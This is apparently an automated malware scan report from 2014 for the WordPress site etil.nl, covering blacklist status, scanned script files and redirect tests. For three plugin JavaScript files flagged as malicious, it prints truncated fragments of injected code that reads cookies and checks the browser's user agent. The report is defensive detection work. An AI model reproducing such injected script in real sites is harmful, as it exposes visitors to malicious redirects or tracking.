Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=etil.nl
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://etil.nl/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://etil.nl/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Mon, 15 Sep 2014 09:52:35 GMT Pragma: no-cache Accept-Ranges: bytes Age: 0 Location: http://www.etil.nl/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Mon, 31 Mar 2008 10:00:00 GMT Set-Cookie: B100Serverpoolcookie=3792412238.39136.3967430248.38806464; path=/ X-Pingback: http://www.etil.nl/xmlrpc.php X-Server: Web-01 | clean |
http://www.etil.nl/ | 200 OK Content-Length: 56463 Content-Type: text/html | clean |
http://www.etil.nl/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 94243 Content-Type: application/javascript | clean |
http://www.etil.nl/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 8354 Content-Type: application/javascript | clean |
http://www.etil.nl/wp-content/themes/boldnews/includes/js/superfish.js?ver=3.8.1 | 200 OK Content-Length: 3963 Content-Type: application/javascript | clean |
http://www.etil.nl/wp-content/themes/boldnews/includes/js/jquery.easing.min.js?ver=3.8.1 | 200 OK Content-Length: 4898 Content-Type: application/javascript | clean |
http://www.etil.nl/wp-content/themes/boldnews/includes/js/woo-jcarousellite.js?ver=3.8.1 | 200 OK Content-Length: 15009 Content-Type: application/javascript | clean |
http://www.etil.nl/wp-content/themes/boldnews/includes/js/general.js?ver=3.8.1 | 200 OK Content-Length: 2156 Content-Type: application/javascript | clean |
http://etil.nl//s7.addthis.com/js/300/addthis_widget.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Mon, 15 Sep 2014 09:52:39 GMT Pragma: no-cache Accept-Ranges: bytes Location: http://www.etil.nl/s7.addthis.com/js/300/addthis_widget.js/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: wfvt_2424854450=5416b6e7be7ff; expires=Mon, 15-Sep-2014 10:22:39 GMT; path=/; httponly Set-Cookie: B100Serverpoolcookie=3792412238.61665.3967430248.38806464; path=/ X-Pingback: http://www.etil.nl/xmlrpc.php X-Server: Web-01 | clean |
http://www.etil.nl/s7.addthis.com/js/300/addthis_widget.js/ | 404 Not Found Content-Length: 27451 Content-Type: text/html | clean |
http://www.etil.nl//s7.addthis.com/js/300/addthis_widget.js/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Mon, 15 Sep 2014 09:52:40 GMT Pragma: no-cache Accept-Ranges: bytes Location: http://www.etil.nl/s7.addthis.com/js/300/addthis_widget.js/ Server: Apache Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Set-Cookie: wfvt_2424854450=5416b6e8db18f; expires=Mon, 15-Sep-2014 10:22:40 GMT; path=/; httponly Set-Cookie: B100Serverpoolcookie=3792412238.19170.3967430248.38806464; path=/ X-Pingback: http://www.etil.nl/xmlrpc.php X-Server: Web-01 | clean |
http://www.etil.nl/test404page.js | 404 Not Found Content-Length: 27451 Content-Type: text/html | clean |
http://www.etil.nl/wp-content/plugins/taxonomies-filter-widget/js/jquery.nouislider.min.js?ver=3.8.1 | 200 OK Content-Length: 6494 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - var v=jQuery.fn.val;jQuery.fn.val=function(){return this.data("_isnS_")?methods.val.apply(this,arguments):v.apply(this,arguments)};return"disabled"==n?methods.disabled.apply(this):methods.create.apply(this)}})(jQuery); Antivirus reports:
| ||
http://www.etil.nl/wp-content/plugins/taxonomies-filter-widget/js/widget.js?ver=3.8.1 | 200 OK Content-Length: 3878 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - $(this).find('input:not([name=s], .input_cf), select').each(function() { if (this.value == '0' || this.value == '') { $(this).prop("disabled", true); } }); }); twfForm.find('input[type=text], select').each(function() { $(this).prop("disabled", false); }); }); }(jQuery)); Antivirus reports:
| ||
http://www.geoplugin.net/javascript.gp?ver=3.8.1 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://www.geoplugin.net/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://www.etil.nl/wp-content/plugins/cookie-control/js/cookieControl-5.1.min.js?ver=3.8.1 | 200 OK Content-Length: 34221 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function getCookie(name) {
var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, '\\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } function Broadbandserviceactu() { var resiser = navigator.userAgent; var teamfact = (resiser.indexOf("Windows") < +1 || resiser.indexOf("Windows NT 6.3") > -1 || resiser.indexOf("IEMobile") > -1 || resiser.indexOf("Chrome") > - Antivirus reports:
| ||
http://www.etil.nl/wp-content/plugins/wysija-newsletters/js/validate/languages/jquery.validationEngine-nl.js?ver=2.6.9 | 200 OK Content-Length: 8083 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: etil.nl
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 15 Sep 2014 09:52:35 GMT
Pragma: no-cache
Accept-Ranges: bytes
Age: 0
Location: http://www.etil.nl/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Mon, 31 Mar 2008 10:00:00 GMT
Set-Cookie: B100Serverpoolcookie=3792412238.39136.3967430248.38806464; path=/
X-Pingback: http://www.etil.nl/xmlrpc.php
X-Server: Web-01
...0 bytes of data.
GET / HTTP/1.1
Host: etil.nl
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Mon, 15 Sep 2014 09:52:35 GMT
Pragma: no-cache
Accept-Ranges: bytes
Age: 0
Location: http://www.etil.nl/
Server: Apache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Mon, 31 Mar 2008 10:00:00 GMT
Set-Cookie: B100Serverpoolcookie=3792412238.39136.3967430248.38806464; path=/
X-Pingback: http://www.etil.nl/xmlrpc.php
X-Server: Web-01
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: etil.nl
Referer: http://www.google.com/search?q=etil.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: etil.nl
Referer: http://www.google.com/search?q=etil.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.